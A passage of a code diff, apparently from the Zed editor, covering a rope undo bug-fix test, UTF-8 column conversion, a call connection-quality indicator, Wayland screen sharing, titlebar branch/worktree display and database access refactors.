+ ranges: vec![FullOffset(1)..FullOffset(4)],
+ new_text: vec!["".into()],
+ });
+
+ // Without the fix this panics with "cannot summarize past end of rope"
+ // because the full 3-byte "cde" fragment is consumed from the deleted
+ // rope instead of only the 2-byte intersection.
+ buffer.apply_ops([synthetic_edit]);
+ assert_eq!(buffer.text(), "afgh");
+
+ buffer.undo_operations([(synthetic_timestamp, u32::MAX)].into_iter().collect());
+ assert_eq!(buffer.text(), "abfgh");
+}
+
#[gpui::test(iterations = 100)]
fn test_random_concurrent_edits(mut rng: StdRng) {
let peers = env::var("PEERS")
@@ -1234,15 +1234,18 @@ impl Buffer {
let fragment_end = old_fragments.end().0.full_offset();
let mut intersection = fragment.clone();
let intersection_end = cmp::min(range.end, fragment_end);
- if fragment.was_visible(version, &self.undo_map) {
+ if version.observed(fragment.timestamp) {
intersection.len = (intersection_end.0 - fragment_start.0) as u32;
intersection.insertion_offset +=
(fragment_start - old_fragments.start().0.full_offset()) as u32;
intersection.id =
Locator::between(&new_fragments.summary().max_id, &intersection.id);
- intersection.deletions.push(timestamp);
- intersection.visible = false;
- insertion_slices.push(InsertionSlice::from_fragment(timestamp, &intersection));
+ if fragment.was_visible(version, &self.undo_map) {
+ intersection.deletions.push(timestamp);
+ intersection.visible = false;
+ insertion_slices
+ .push(InsertionSlice::from_fragment(timestamp, &intersection));
+ }
}
if intersection.len > 0 {
if fragment.visible && !intersection.visible {
@@ -2254,6 +2257,37 @@ impl BufferSnapshot {
(row_end_offset - row_start_offset) as u32
}
+ /// A function to convert character offsets from e.g. user's `go.mod:22:33` input into byte-offset Point columns.
+ pub fn point_from_external_input(&self, row: u32, characters: u32) -> Point {
+ const MAX_BYTES_IN_UTF_8: u32 = 4;
+
+ let row = row.min(self.max_point().row);
+ let start = Point::new(row, 0);
+ let end = self.clip_point(
+ Point::new(
+ row,
+ characters
+ .saturating_mul(MAX_BYTES_IN_UTF_8)
+ .saturating_add(1),
+ ),
+ Bias::Right,
+ );
+ let range = start..end;
+ let mut point = range.start;
+ let mut remaining_columns = characters;
+
+ for chunk in self.text_for_range(range) {
+ for character in chunk.chars() {
+ if remaining_columns == 0 {
+ return point;
+ }
+ remaining_columns -= 1;
+ point.column += character.len_utf8() as u32;
+ }
+ }
+ point
+ }
+
pub fn line_indents_in_row_range(
&self,
row_range: Range<u32>,
@@ -378,14 +378,14 @@ pub fn set_mode(content: &mut SettingsContent, mode: ThemeAppearanceMode) {
if let Some(selection) = theme.theme.as_mut() {
match selection {
- settings::ThemeSelection::Static(theme) => {
+ settings::ThemeSelection::Static(_) => {
// If the theme was previously set to a single static theme,
- // we don't know whether it was a light or dark theme, so we
- // just use it for both.
+ // reset to the default dynamic light/dark pair and let users
+ // customize light/dark themes explicitly afterward.
*selection = settings::ThemeSelection::Dynamic {
- mode,
- light: theme.clone(),
- dark: theme.clone(),
+ mode: ThemeAppearanceMode::System,
+ light: ThemeName(settings::DEFAULT_LIGHT_THEME.into()),
+ dark: ThemeName(settings::DEFAULT_DARK_THEME.into()),
};
}
settings::ThemeSelection::Dynamic {
@@ -311,10 +311,11 @@ impl PickerDelegate for IconThemeSelectorDelegate {
.border_color(cx.theme().colors().border_variant)
.child(
Button::new("docs", "View Icon Theme Docs")
- .icon(IconName::ArrowUpRight)
- .icon_position(IconPosition::End)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_event, _window, cx| {
cx.open_url("https://zed.dev/docs/icon-themes");
}),
@@ -497,10 +497,11 @@ impl PickerDelegate for ThemeSelectorDelegate {
.border_color(cx.theme().colors().border_variant)
.child(
Button::new("docs", "View Theme Docs")
- .icon(IconName::ArrowUpRight)
- .icon_position(IconPosition::End)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(cx.listener(|_, _, _, cx| {
cx.open_url("https://zed.dev/docs/themes");
})),
@@ -38,13 +38,15 @@ chrono.workspace = true
client.workspace = true
cloud_api_types.workspace = true
db.workspace = true
-feature_flags.workspace = true
git_ui.workspace = true
gpui = { workspace = true, features = ["screen-capture"] }
+icons.workspace = true
+livekit_client.workspace = true
notifications.workspace = true
project.workspace = true
recent_projects.workspace = true
remote.workspace = true
+remote_connection.workspace = true
rpc.workspace = true
semver.workspace = true
schemars.workspace = true
@@ -114,8 +114,9 @@ impl ApplicationMenu {
name,
action,
checked,
+ disabled,
..
- } => menu.action_checked(name, action, checked),
+ } => menu.action_checked_with_disabled(name, action, checked, disabled),
OwnedMenuItem::Submenu(submenu) => {
submenu
.items
@@ -126,8 +127,10 @@ impl ApplicationMenu {
name,
action,
checked,
+ disabled,
..
- } => menu.action_checked(name, action, checked),
+ } => menu
+ .action_checked_with_disabled(name, action, checked, disabled),
OwnedMenuItem::Submenu(_) => menu,
OwnedMenuItem::SystemMenu(_) => {
// A system menu doesn't make sense in this context, so ignore it
@@ -9,7 +9,10 @@ use gpui::{
canvas, point,
};
use gpui::{App, Task, Window};
+use icons::IconName;
+use livekit_client::ConnectionQuality;
use project::WorktreeSettings;
+use remote_connection::RemoteConnectionModal;
use rpc::proto::{self};
use settings::{Settings as _, SettingsLocation};
use theme::ActiveTheme;
@@ -19,9 +22,17 @@ use ui::{
};
use util::rel_path::RelPath;
use workspace::{ParticipantLocation, notifications::DetachAndPromptErr};
+use zed_actions::ShowCallStats;
use crate::TitleBar;
+fn format_stat(value: Option<f64>, format: impl Fn(f64) -> String) -> String {
+ match value {
+ Some(v) => format(v),
+ None => "—".to_string(),
+ }
+}
+
pub fn toggle_screen_sharing(
screen: anyhow::Result<Option<Rc<dyn ScreenCaptureSource>>>,
window: &mut Window,
@@ -332,7 +343,11 @@ impl TitleBar {
let is_connecting_to_project = self
.workspace
- .update(cx, |workspace, cx| workspace.has_active_modal(window, cx))
+ .update(cx, |workspace, cx| {
+ workspace
+ .active_modal::<RemoteConnectionModal>(cx)
+ .is_some()
+ })
.unwrap_or(false);
let room = room.read(cx);
@@ -347,6 +362,11 @@ impl TitleBar {
let can_share_projects = room.can_share_projects();
let screen_sharing_supported = cx.is_screen_capture_supported();
+ let stats = room
+ .diagnostics()
+ .map(|d| d.read(cx).stats().clone())
+ .unwrap_or_default();
+
let channel_store = ChannelStore::global(cx);
let channel = room
.channel_id()
@@ -354,6 +374,45 @@ impl TitleBar {
let mut children = Vec::new();
+ let effective_quality = stats.effective_quality.unwrap_or(ConnectionQuality::Lost);
+ let (signal_icon, signal_color, quality_label) = match effective_quality {
+ ConnectionQuality::Excellent => {
+ (IconName::SignalHigh, Some(Color::Success), "Excellent")
+ }
+ ConnectionQuality::Good => (IconName::SignalHigh, None, "Good"),
+ ConnectionQuality::Poor => (IconName::SignalMedium, Some(Color::Warning), "Poor"),
+ ConnectionQuality::Lost => (IconName::SignalLow, Some(Color::Error), "Lost"),
+ };
+ let quality_label: SharedString = quality_label.into();
+ children.push(
+ IconButton::new("call-quality", signal_icon)
+ .style(ButtonStyle::Subtle)
+ .icon_size(IconSize::Small)
+ .when_some(signal_color, |button, color| button.icon_color(color))
+ .tooltip(move |_window, cx| {
+ let quality_label = quality_label.clone();
+ let latency = format_stat(stats.latency_ms, |v| format!("{:.0}ms", v));
+ let jitter = format_stat(stats.jitter_ms, |v| format!("{:.0}ms", v));
+ let packet_loss = format_stat(stats.packet_loss_pct, |v| format!("{:.1}%", v));
+ let input_lag =
+ format_stat(stats.input_lag.map(|d| d.as_secs_f64() * 1000.0), |v| {
+ format!("{:.1}ms", v)
+ });
+
+ Tooltip::with_meta(
+ format!("Connection: {quality_label}"),
+ Some(&ShowCallStats),
+ format!(
+ "Latency: {latency} · Jitter: {jitter} · Loss: {packet_loss} · Input lag: {input_lag}",
+ ),
+ cx,
+ )
+ })
+ .on_click(move |_, window, cx| {
+ window.dispatch_action(Box::new(ShowCallStats), cx);
+ })
+ .into_any_element(),
+ );
children.push(
h_flex()
.gap_1()
@@ -489,6 +548,11 @@ impl TitleBar {
);
if can_use_microphone && screen_sharing_supported {
+ #[cfg(target_os = "linux")]
+ let is_wayland = gpui::guess_compositor() == "Wayland";
+ #[cfg(not(target_os = "linux"))]
+ let is_wayland = false;
+
let trigger = IconButton::new("screen-share", IconName::Screen)
.style(ButtonStyle::Subtle)
.icon_size(IconSize::Small)
@@ -505,28 +569,56 @@ impl TitleBar {
.room()
.is_some_and(|room| !room.read(cx).is_sharing_screen());
- window
- .spawn(cx, async move |cx| {
- let screen = if should_share {
- cx.update(|_, cx| pick_default_screen(cx))?.await
- } else {
- Ok(None)
- };
- cx.update(|window, cx| toggle_screen_sharing(screen, window, cx))?;
+ #[cfg(target_os = "linux")]
+ {
+ if is_wayland
+ && let Some(room) = ActiveCall::global(cx).read(cx).room().cloned()
+ {
+ let task = room.update(cx, |room, cx| {
+ if should_share {
+ room.share_screen_wayland(cx)
+ } else {
+ room.unshare_screen(true, cx)
+ .map(|()| Task::ready(Ok(())))
+ .unwrap_or_else(|e| Task::ready(Err(e)))
+ }
+ });
+ task.detach_and_prompt_err(
+ "Sharing Screen Failed",
+ window,
+ cx,
+ |e, _, _| Some(format!("{e:?}")),
+ );
+ }
+ }
+ if !is_wayland {
+ window
+ .spawn(cx, async move |cx| {
+ let screen = if should_share {
+ cx.update(|_, cx| pick_default_screen(cx))?.await
+ } else {
+ Ok(None)
+ };
+ cx.update(|window, cx| toggle_screen_sharing(screen, window, cx))?;
- Result::<_, anyhow::Error>::Ok(())
- })
- .detach();
+ Result::<_, anyhow::Error>::Ok(())
+ })
+ .detach();
+ }
});
- children.push(
- SplitButton::new(
- trigger.render(window, cx),
- self.render_screen_list().into_any_element(),
- )
- .style(SplitButtonStyle::Transparent)
- .into_any_element(),
- );
+ if is_wayland {
+ children.push(trigger.into_any_element());
+ } else {
+ children.push(
+ SplitButton::new(
+ trigger.render(window, cx),
+ self.render_screen_list().into_any_element(),
+ )
+ .style(SplitButtonStyle::Transparent)
+ .into_any_element(),
+ );
+ }
}
children.push(div().pr_2().into_any_element());
@@ -44,7 +44,7 @@ impl OnboardingBanner {
subtitle: subtitle.or(Some(SharedString::from("Introducing:"))),
},
visible_when: None,
- dismissed: get_dismissed(source),
+ dismissed: get_dismissed(source, cx),
}
}
@@ -75,9 +75,9 @@ fn dismissed_at_key(source: &str) -> String {
}
}
-fn get_dismissed(source: &str) -> bool {
+fn get_dismissed(source: &str, cx: &App) -> bool {
let dismissed_at = dismissed_at_key(source);
- db::kvp::KEY_VALUE_STORE
+ db::kvp::KeyValueStore::global(cx)
.read_kvp(&dismissed_at)
.log_err()
.is_some_and(|dismissed| dismissed.is_some())
@@ -85,9 +85,10 @@ fn get_dismissed(source: &str) -> bool {
fn persist_dismissed(source: &str, cx: &mut App) {
let dismissed_at = dismissed_at_key(source);
- cx.spawn(async |_| {
+ let kvp = db::kvp::KeyValueStore::global(cx);
+ cx.spawn(async move |_| {
let time = chrono::Utc::now().to_rfc3339();
- db::kvp::KEY_VALUE_STORE.write_kvp(dismissed_at, time).await
+ kvp.write_kvp(dismissed_at, time).await
})
.detach_and_log_err(cx);
}
@@ -105,7 +106,8 @@ pub fn restore_banner(cx: &mut App) {
let source = &cx.global::<BannerGlobal>().entity.read(cx).source;
let dismissed_at = dismissed_at_key(source);
- cx.spawn(async |_| db::kvp::KEY_VALUE_STORE.delete_kvp(dismissed_at).await)
+ let kvp = db::kvp::KeyValueStore::global(cx);
+ cx.spawn(async move |_| kvp.delete_kvp(dismissed_at).await)
.detach_and_log_err(cx);
}
@@ -33,6 +33,7 @@ impl RenderOnce for PlanChip {
Plan::ZedFree => ("Free", Color::Default, free_chip_bg),
Plan::ZedProTrial => ("Pro Trial", Color::Accent, pro_chip_bg),
Plan::ZedPro => ("Pro", Color::Accent, pro_chip_bg),
+ Plan::ZedBusiness => ("Business", Color::Accent, pro_chip_bg),
Plan::ZedStudent => ("Student", Color::Accent, pro_chip_bg),
};
@@ -14,6 +14,7 @@ pub use platform_title_bar::{
self, DraggedWindowTab, MergeAllWindows, MoveTabToNewWindow, PlatformTitleBar,
ShowNextWindowTab, ShowPreviousWindowTab,
};
+use project::linked_worktree_short_name;
#[cfg(not(target_os = "macos"))]
use crate::application_menu::{
@@ -24,19 +25,18 @@ use auto_update::AutoUpdateStatus;
use call::ActiveCall;
use client::{Client, UserStore, zed_urls};
use cloud_api_types::Plan;
-use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt};
+
use gpui::{
Action, AnyElement, App, Context, Corner, Element, Empty, Entity, Focusable,
InteractiveElement, IntoElement, MouseButton, ParentElement, Render,
StatefulInteractiveElement, Styled, Subscription, WeakEntity, Window, actions, div,
};
use onboarding_banner::OnboardingBanner;
-use project::{
- DisableAiSettings, Project, git_store::GitStoreEvent, trusted_worktrees::TrustedWorktrees,
-};
+use project::{Project, git_store::GitStoreEvent, trusted_worktrees::TrustedWorktrees};
use remote::RemoteConnectionOptions;
use settings::Settings;
use settings::WorktreeId;
+use std::collections::HashSet;
use std::sync::Arc;
use theme::ActiveTheme;
use title_bar_settings::TitleBarSettings;
@@ -47,8 +47,7 @@ use ui::{
use update_version::UpdateVersion;
use util::ResultExt;
use workspace::{
- MultiWorkspace, ToggleWorkspaceSidebar, ToggleWorktreeSecurity, Workspace,
- notifications::NotifyResultExt,
+ MultiWorkspace, ToggleWorktreeSecurity, Workspace, WorkspaceId, notifications::NotifyResultExt,
};
use zed_actions::OpenRemote;
@@ -157,24 +156,46 @@ pub struct TitleBar {
banner: Entity<OnboardingBanner>,
update_version: Entity<UpdateVersion>,
screen_share_popover_handle: PopoverMenuHandle<ContextMenu>,
+ _diagnostics_subscription: Option<gpui::Subscription>,
}
impl Render for TitleBar {
fn render(&mut self, window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
let title_bar_settings = *TitleBarSettings::get_global(cx);
+ let button_layout = title_bar_settings.button_layout;
let show_menus = show_menus(cx);
let mut children = Vec::new();
+ let mut project_name = None;
+ let mut repository = None;
+ let mut linked_worktree_name = None;
+ if let Some(worktree) = self.effective_active_worktree(cx) {
+ repository = self.get_repository_for_worktree(&worktree, cx);
+ let worktree = worktree.read(cx);
+ project_name = worktree
+ .root_name()
+ .file_name()
+ .map(|name| SharedString::from(name.to_string()));
+ linked_worktree_name = repository.as_ref().and_then(|repo| {
+ let repo = repo.read(cx);
+ linked_worktree_short_name(
+ repo.original_repo_abs_path.as_ref(),
+ repo.work_directory_abs_path.as_ref(),
+ )
+ .filter(|name| Some(name) != project_name.as_ref())
+ });
+ }
+
children.push(
h_flex()
+ .h_full()
.gap_0p5()
.map(|title_bar| {
let mut render_project_items = title_bar_settings.show_branch_name
|| title_bar_settings.show_project_items;
title_bar
- .children(self.render_workspace_sidebar_toggle(window, cx))
.when_some(
self.application_menu.clone().filter(|_| !show_menus),
|title_bar, menu| {
@@ -189,11 +210,18 @@ impl Render for TitleBar {
.when(title_bar_settings.show_project_items, |title_bar| {
title_bar
.children(self.render_project_host(cx))
- .child(self.render_project_name(window, cx))
- })
- .when(title_bar_settings.show_branch_name, |title_bar| {
- title_bar.children(self.render_project_branch(cx))
+ .child(self.render_project_name(project_name, window, cx))
})
+ .when_some(
+ repository.filter(|_| title_bar_settings.show_branch_name),
+ |title_bar, repository| {
+ title_bar.children(self.render_project_branch(
+ repository,
+ linked_worktree_name,
+ cx,
+ ))
+ },
+ )
})
})
.on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation())
@@ -239,6 +267,7 @@ impl Render for TitleBar {
if show_menus {
self.platform_titlebar.update(cx, |this, _| {
+ this.set_button_layout(button_layout);
this.set_children(
self.application_menu
.clone()
@@ -266,6 +295,7 @@ impl Render for TitleBar {
.into_any_element()
} else {
self.platform_titlebar.update(cx, |this, _| {
+ this.set_button_layout(button_layout);
this.set_children(children);
});
self.platform_titlebar.clone().into_any_element()
@@ -333,6 +363,7 @@ impl TitleBar {
}),
);
subscriptions.push(cx.observe(&user_store, |_a, _, cx| cx.notify()));
+ subscriptions.push(cx.observe_button_layout_changed(window, |_, _, cx| cx.notify()));
if let Some(trusted_worktrees) = TrustedWorktrees::try_get_global(cx) {
subscriptions.push(cx.subscribe(&trusted_worktrees, |_, _, _, cx| {
cx.notify();
@@ -370,20 +401,16 @@ impl TitleBar {
return;
};
- let is_open = multi_workspace.read(cx).is_sidebar_open();
- let has_notifications = multi_workspace.read(cx).sidebar_has_notifications(cx);
+ let is_open = multi_workspace.read(cx).sidebar_open();
platform_titlebar.update(cx, |titlebar, cx| {
titlebar.set_workspace_sidebar_open(is_open, cx);
- titlebar.set_sidebar_has_notifications(has_notifications, cx);
});
let platform_titlebar = platform_titlebar.clone();
let subscription = cx.observe(&multi_workspace, move |mw, cx| {
- let is_open = mw.read(cx).is_sidebar_open();
- let has_notifications = mw.read(cx).sidebar_has_notifications(cx);
+ let is_open = mw.read(cx).sidebar_open();
platform_titlebar.update(cx, |titlebar, cx| {
titlebar.set_workspace_sidebar_open(is_open, cx);
- titlebar.set_sidebar_has_notifications(has_notifications, cx);
});
});
@@ -398,7 +425,7 @@ impl TitleBar {
.detach();
}
- Self {
+ let mut this = Self {
platform_titlebar,
application_menu,
workspace: workspace.weak_handle(),
@@ -410,7 +437,12 @@ impl TitleBar {
banner,
update_version,
screen_share_popover_handle: PopoverMenuHandle::default(),
- }
+ _diagnostics_subscription: None,
+ };
+
+ this.observe_diagnostics(cx);
+
+ this
}
fn worktree_count(&self, cx: &App) -> usize {
@@ -484,14 +516,15 @@ impl TitleBar {
let git_store = project.git_store().read(cx);
let worktree_path = worktree.read(cx).abs_path();
- for repo in git_store.repositories().values() {
- let repo_path = &repo.read(cx).work_directory_abs_path;
- if worktree_path == *repo_path || worktree_path.starts_with(repo_path.as_ref()) {
- return Some(repo.clone());
- }
- }
-
- None
+ git_store
+ .repositories()
+ .values()
+ .filter(|repo| {
+ let repo_path = &repo.read(cx).work_directory_abs_path;
+ worktree_path == *repo_path || worktree_path.starts_with(repo_path.as_ref())
+ })
+ .max_by_key(|repo| repo.read(cx).work_directory_abs_path.as_os_str().len())
+ .cloned()
}
fn render_remote_project_connection(&self, cx: &mut Context<Self>) -> Option<AnyElement> {
@@ -607,10 +640,11 @@ impl TitleBar {
.style(ButtonStyle::Tinted(TintColor::Warning))
.label_size(LabelSize::Small)
.color(Color::Warning)
- .icon(IconName::Warning)
- .icon_color(Color::Warning)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Warning)
+ .size(IconSize::Small)
+ .color(Color::Warning),
+ )
.tooltip(|_, cx| {
Tooltip::with_meta(
"You're in Restricted Mode",
@@ -686,53 +720,14 @@ impl TitleBar {
)
}
- fn render_workspace_sidebar_toggle(
+ fn render_project_name(
&self,
- _window: &mut Window,
- cx: &mut Context<Self>,
- ) -> Option<AnyElement> {
- if !cx.has_flag::<AgentV2FeatureFlag>() || DisableAiSettings::get_global(cx).disable_ai {
- return None;
- }
-
- let is_sidebar_open = self.platform_titlebar.read(cx).is_workspace_sidebar_open();
-
- if is_sidebar_open {
- return None;
- }
-
- let has_notifications = self.platform_titlebar.read(cx).sidebar_has_notifications();
-
- Some(
- IconButton::new("toggle-workspace-sidebar", IconName::WorkspaceNavClosed)
- .icon_size(IconSize::Small)
- .when(has_notifications, |button| {
- button
- .indicator(Indicator::dot().color(Color::Accent))
- .indicator_border_color(Some(cx.theme().colors().title_bar_background))
- })
- .tooltip(move |_, cx| {
- Tooltip::for_action("Open Threads Sidebar", &ToggleWorkspaceSidebar, cx)
- })
- .on_click(|_, window, cx| {
- window.dispatch_action(ToggleWorkspaceSidebar.boxed_clone(), cx);
- })
- .into_any_element(),
- )
- }
-
- pub fn render_project_name(
- &self,
- window: &mut Window,
+ name: Option<SharedString>,
+ _: &mut Window,
cx: &mut Context<Self>,
) -> impl IntoElement {
let workspace = self.workspace.clone();
- let name = self.effective_active_worktree(cx).map(|worktree| {
- let worktree = worktree.read(cx);
- SharedString::from(worktree.root_name().as_unix_str().to_string())
- });
-
let is_project_selected = name.is_some();
let display_name = if let Some(ref name) = name {
@@ -743,14 +738,16 @@ impl TitleBar {
let is_sidebar_open = self.platform_titlebar.read(cx).is_workspace_sidebar_open();
- if is_sidebar_open {
+ let is_threads_list_view_active = self
+ .multi_workspace
+ .as_ref()
+ .and_then(|mw| mw.upgrade())
+ .map(|mw| mw.read(cx).is_threads_list_view_active(cx))
+ .unwrap_or(false);
+
+ if is_sidebar_open && is_threads_list_view_active {
return self
- .render_project_name_with_sidebar_popover(
- window,
- display_name,
- is_project_selected,
- cx,
- )
+ .render_recent_projects_popover(display_name, is_project_selected, cx)
.into_any_element();
}
@@ -759,10 +756,24 @@ impl TitleBar {
.map(|w| w.read(cx).focus_handle(cx))
.unwrap_or_else(|| cx.focus_handle());
+ let sibling_workspace_ids: HashSet<WorkspaceId> = self
+ .multi_workspace
+ .as_ref()
+ .and_then(|mw| mw.upgrade())
+ .map(|mw| {
+ mw.read(cx)
+ .workspaces()
+ .iter()
+ .filter_map(|ws| ws.read(cx).database_id())
+ .collect()
+ })
+ .unwrap_or_default();
+
PopoverMenu::new("recent-projects-menu")
.menu(move |window, cx| {
Some(recent_projects::RecentProjects::popover(
workspace.clone(),
+ sibling_workspace_ids.clone(),
false,
focus_handle.clone(),
window,
@@ -773,9 +784,11 @@ impl TitleBar {
Button::new("project_name_trigger", display_name)
.label_size(LabelSize::Small)
.when(self.worktree_count(cx) > 1, |this| {
- this.icon(IconName::ChevronDown)
- .icon_color(Color::Muted)
- .icon_size(IconSize::XSmall)
+ this.end_icon(
+ Icon::new(IconName::ChevronDown)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
})
.selected_style(ButtonStyle::Tinted(TintColor::Accent))
.when(!is_project_selected, |s| s.color(Color::Muted)),
@@ -793,56 +806,79 @@ impl TitleBar {
.into_any_element()
}
- fn render_project_name_with_sidebar_popover(
+ fn render_recent_projects_popover(
&self,
- _window: &Window,
display_name: String,
is_project_selected: bool,
cx: &mut Context<Self>,
) -> impl IntoElement {
- let multi_workspace = self.multi_workspace.clone();
+ let workspace = self.workspace.clone();
+
+ let focus_handle = workspace
+ .upgrade()
+ .map(|w| w.read(cx).focus_handle(cx))
+ .unwrap_or_else(|| cx.focus_handle());
- let is_popover_deployed = multi_workspace
+ let sibling_workspace_ids: HashSet<WorkspaceId> = self
+ .multi_workspace
.as_ref()
.and_then(|mw| mw.upgrade())
- .map(|mw| mw.read(cx).is_recent_projects_popover_deployed(cx))
- .unwrap_or(false);
-
- Button::new("project_name_trigger", display_name)
- .label_size(LabelSize::Small)
- .when(self.worktree_count(cx) > 1, |this| {
- this.icon(IconName::ChevronDown)
- .icon_color(Color::Muted)
- .icon_size(IconSize::XSmall)
+ .map(|mw| {
+ mw.read(cx)
+ .workspaces()
+ .iter()
+ .filter_map(|ws| ws.read(cx).database_id())
+ .collect()
})
- .toggle_state(is_popover_deployed)
- .selected_style(ButtonStyle::Tinted(TintColor::Accent))
- .when(!is_project_selected, |s| s.color(Color::Muted))
- .tooltip(move |_window, cx| {
- Tooltip::for_action(
- "Recent Projects",
- &zed_actions::OpenRecent {
- create_new_window: false,
- },
+ .unwrap_or_default();
+
+ PopoverMenu::new("sidebar-title-recent-projects-menu")
+ .menu(move |window, cx| {
+ Some(recent_projects::RecentProjects::popover(
+ workspace.clone(),
+ sibling_workspace_ids.clone(),
+ false,
+ focus_handle.clone(),
+ window,
cx,
- )
- })
- .on_click(move |_, window, cx| {
- if let Some(mw) = multi_workspace.as_ref().and_then(|mw| mw.upgrade()) {
- mw.update(cx, |mw, cx| {
- mw.toggle_recent_projects_popover(window, cx);
- });
- }
+ ))
})
+ .trigger_with_tooltip(
+ Button::new("project_name_trigger", display_name)
+ .label_size(LabelSize::Small)
+ .when(self.worktree_count(cx) > 1, |this| {
+ this.end_icon(
+ Icon::new(IconName::ChevronDown)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
+ })
+ .selected_style(ButtonStyle::Tinted(TintColor::Accent))
+ .when(!is_project_selected, |s| s.color(Color::Muted)),
+ move |_window, cx| {
+ Tooltip::for_action(
+ "Recent Projects",
+ &zed_actions::OpenRecent {
+ create_new_window: false,
+ },
+ cx,
+ )
+ },
+ )
+ .anchor(gpui::Corner::TopLeft)
}
- pub fn render_project_branch(&self, cx: &mut Context<Self>) -> Option<impl IntoElement> {
- let effective_worktree = self.effective_active_worktree(cx)?;
- let repository = self.get_repository_for_worktree(&effective_worktree, cx)?;
+ fn render_project_branch(
+ &self,
+ repository: Entity<project::git_store::Repository>,
+ linked_worktree_name: Option<SharedString>,
+ cx: &mut Context<Self>,
+ ) -> Option<impl IntoElement> {
let workspace = self.workspace.upgrade()?;
let (branch_name, icon_info) = {
let repo = repository.read(cx);
+
let branch_name = repo
.branch
.as_ref()
@@ -875,8 +911,8 @@ impl TitleBar {
(branch_name, icon_info)
};
+ let branch_name = branch_name?;
let settings = TitleBarSettings::get_global(cx);
-
let effective_repository = Some(repository);
Some(
@@ -892,23 +928,42 @@ impl TitleBar {
))
})
.trigger_with_tooltip(
- Button::new("project_branch_trigger", branch_name?)
+ ButtonLike::new("project_branch_trigger")
.selected_style(ButtonStyle::Tinted(TintColor::Accent))
- .label_size(LabelSize::Small)
- .color(Color::Muted)
- .when(settings.show_branch_icon, |branch_button| {
- let (icon, icon_color) = icon_info;
- branch_button
- .icon(icon)
- .icon_position(IconPosition::Start)
- .icon_color(icon_color)
- .icon_size(IconSize::Indicator)
- }),
+ .child(
+ h_flex()
+ .gap_0p5()
+ .when(settings.show_branch_icon, |this| {
+ let (icon, icon_color) = icon_info;
+ this.child(
+ Icon::new(icon).size(IconSize::XSmall).color(icon_color),
+ )
+ })
+ .when_some(linked_worktree_name.as_ref(), |this, worktree_name| {
+ this.child(
+ Label::new(worktree_name)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ .child(
+ Label::new("/").size(LabelSize::Small).color(
+ Color::Custom(
+ cx.theme().colors().text_muted.opacity(0.4),
+ ),
+ ),
+ )
+ })
+ .child(
+ Label::new(branch_name)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ ),
+ ),
move |_window, cx| {
Tooltip::with_meta(
- "Recent Branches",
+ "Git Switcher",
Some(&zed_actions::git::Branch),
- "Local branches only",
+ "Worktrees, Branches, and Stashes",
cx,
)
},
@@ -935,9 +990,23 @@ impl TitleBar {
}
fn active_call_changed(&mut self, cx: &mut Context<Self>) {
+ self.observe_diagnostics(cx);
cx.notify();
}
+ fn observe_diagnostics(&mut self, cx: &mut Context<Self>) {
+ let diagnostics = ActiveCall::global(cx)
+ .read(cx)
+ .room()
+ .and_then(|room| room.read(cx).diagnostics().cloned());
+
+ if let Some(diagnostics) = diagnostics {
+ self._diagnostics_subscription = Some(cx.observe(&diagnostics, |_, _, cx| cx.notify()));
+ } else {
+ self._diagnostics_subscription = None;
+ }
+ }
+
fn share_project(&mut self, cx: &mut Context<Self>) {
let active_call = ActiveCall::global(cx);
let project = self.project.clone();
@@ -1,3 +1,4 @@
+use gpui::WindowButtonLayout;
use settings::{RegisterSetting, Settings, SettingsContent};
#[derive(Copy, Clone, Debug, RegisterSetting)]
@@ -10,6 +11,7 @@ pub struct TitleBarSettings {
pub show_sign_in: bool,
pub show_user_menu: bool,
pub show_menus: bool,
+ pub button_layout: Option<WindowButtonLayout>,
}
impl Settings for TitleBarSettings {
@@ -24,6 +26,7 @@ impl Settings for TitleBarSettings {
show_sign_in: content.show_sign_in.unwrap(),
show_user_menu: content.show_user_menu.unwrap(),
show_menus: content.show_menus.unwrap(),
+ button_layout: content.button_layout.unwrap_or_default().into_layout(),
}
}
}
@@ -202,15 +202,15 @@ impl ActiveToolchain {
this.worktree_for_id(worktree_id, cx)
.map(|worktree| worktree.read(cx).abs_path())
})?;
- workspace::WORKSPACE_DB
- .set_toolchain(
- workspace_id,
- worktree_root_path,
- relative_path.clone(),
- toolchain.clone(),
- )
- .await
- .ok()?;
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx)).ok()?;
+ db.set_toolchain(
+ workspace_id,
+ worktree_root_path,
+ relative_path.clone(),
+ toolchain.clone(),
+ )
+ .await
+ .ok()?;
project
.update(cx, |this, cx| {
this.activate_toolchain(
@@ -920,16 +920,16 @@ impl PickerDelegate for ToolchainSelectorDelegate {
let worktree_abs_path_root = self.worktree_abs_path_root.clone();
let path = self.relative_path.clone();
let relative_path = self.relative_path.clone();
+ let db = workspace::WorkspaceDb::global(cx);
cx.spawn_in(window, async move |_, cx| {
- workspace::WORKSPACE_DB
- .set_toolchain(
- workspace_id,
- worktree_abs_path_root,
- relative_path,
- toolchain.clone(),
- )
- .await
- .log_err();
+ db.set_toolchain(
+ workspace_id,
+ worktree_abs_path_root,
+ relative_path,
+ toolchain.clone(),
+ )
+ .await
+ .log_err();
workspace
.update(cx, |this, cx| {
this.project().update(cx, |this, cx| {
@@ -6,6 +6,7 @@ mod callout;
mod chip;
mod collab;
mod context_menu;
+mod count_badge;
mod data_table;
mod diff_stat;
mod disclosure;
@@ -49,6 +50,7 @@ pub use callout::*;
pub use chip::*;
pub use collab::*;
pub use context_menu::*;
+pub use count_badge::*;
pub use data_table::*;
pub use diff_stat::*;
pub use disclosure::*;
@@ -1,7 +1,7 @@
use crate::{Tooltip, prelude::*};
use gpui::{ClickEvent, IntoElement, ParentElement, SharedString};
-#[derive(IntoElement)]
+#[derive(IntoElement, RegisterComponent)]
pub struct ConfiguredApiCard {
